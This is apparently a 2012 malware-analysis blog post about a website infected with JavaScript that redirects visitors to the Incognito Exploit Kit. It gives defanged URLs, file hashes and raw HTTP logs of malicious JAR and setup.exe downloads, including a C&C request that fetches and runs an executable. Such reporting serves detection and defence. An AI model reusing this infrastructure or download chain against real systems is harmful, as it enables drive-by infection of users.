Preventsweating.com infected by Incognito Exploit Kit

Our honeypot has logged an infected website:

hxxp://www.preventsweating .com

The malicious javascript code is at the end of the page:

Image

Download dumped content (pass is novirusthanks.org):
exploit.zip / 1 KB

We have analyzed the infected website with our sandbox and we can see from the network traffic that the obfuscated javascript code redirects users to the Incognito Exploit Kit url that is used to exploit a Java vulnerability and to infect the user PC with the payload setup.exe.

The malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:19 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=e7246650.jar
 
PK........ΣΈ=@..

File details:

File: e7246650.jar
Size: 11864 bytes
MD5 Hash: 6CA56D1DF8E07747E3FCC2B090B784CF
SHA1 Hash: 1C71A325AA8A42633634084D6406816963848ADC
SHA256 Hash: 2B863CFD204781DB5EA4AD42AA39EF97DBC0D294DD13DC86904A04DE215B560A
SHA384 Hash: AF8B8A2FB3107A2EEDCC559A8E2AA4350FD8CBCDBA0E3D08B10AC9CD49A8002997812C9B2D1015E92F98A7A7779FA10A
SHA512 Hash: 4FB8AA0F57D5FF66922741295DF6E66825E18CCB6E182F94D5498C193611E2B1975BDE7C2FD7B70FFFF3323D45EAB4CF3132D696D9A3A42AE225E1DD58223A8B

Note that the .JAR file can be downloaded only using:

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13

The payload is downloaded:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:21 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
Content-Transfer-Encoding: binary
Content-Length: 19968
Content-Disposition: inline; filename=setup.exe

File details:

File: setup.exe
Size: 19968 bytes
MD5 Hash: 53C8A9B30801AA54B91F2998BB541830
SHA1 Hash: 88AD96FE946428CF1784455F4A31D146236942CE
SHA256 Hash: 44FF06AA29B35E73CC31FBD63C02919C368EC967523E1C573047F4053561B313
SHA384 Hash: 812C0496FCAE403A4D541BEA5CBF5D5FC58A43BC872B1BC5C76DB1B76986502A57FF11104145EAF6F356BC089754BCAF
SHA512 Hash: 8184FD20E81CD4C0635F81518F53D7697A3412AA5C8B8F355EF739BFC1769E3DB0143344A109671C301D689CDDE7CE8581DC921E3808DFA81A4F9DFD349D73B6

Another malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=7c11db5a.jar

File details:

File: 7c11db5a.jar
Size: 16412 bytes
MD5 Hash: 45506395884D542068FCD39AB63157DD
SHA1 Hash: C8B351A83997D9EB5B0473072EA165949A94576C
SHA256 Hash: FF1A8129802655FD1E45A29B2329159A2AFC40BBCCB2AD2ED073C94ED228E98E
SHA384 Hash: 9B7A6C95D67A6BBBDAFB6C36552FF1A8E219A8298D76C8AE379F5CDA96391D2AC6B3733FF26032DCE99DC3355AC75284
SHA512 Hash: 0CDC120ADF5A425611880FCB86ACD34F2BC79B7F5CF354E71A43D2EBAFCCAD3D78E6373CB5073CA71C695C71392D26640E231C6FFFCC4E01207173971F47F043

Other HTTP GET requests:

GET /net.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /edu.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /com.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl

An executable file is downloaded (and executed) from the C&C server:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777 HTTP/1.1
Host: hotlupdate .ru

HTTP/1.1 200 OK
Date: Mon, 30 Jan 2012 23:38:47 GMT
Server: Apache/2.2.21 (CentOS)
X-Powered-By: PHP/5.3.9
Cache-Control: public
Content-Disposition: attachment; filename=243
Content-Transfer-Encoding: binary
Content-Length: 218112
Connection: close
Content-Type: application/octet-stream

MZ

Random Posts

Previous Posts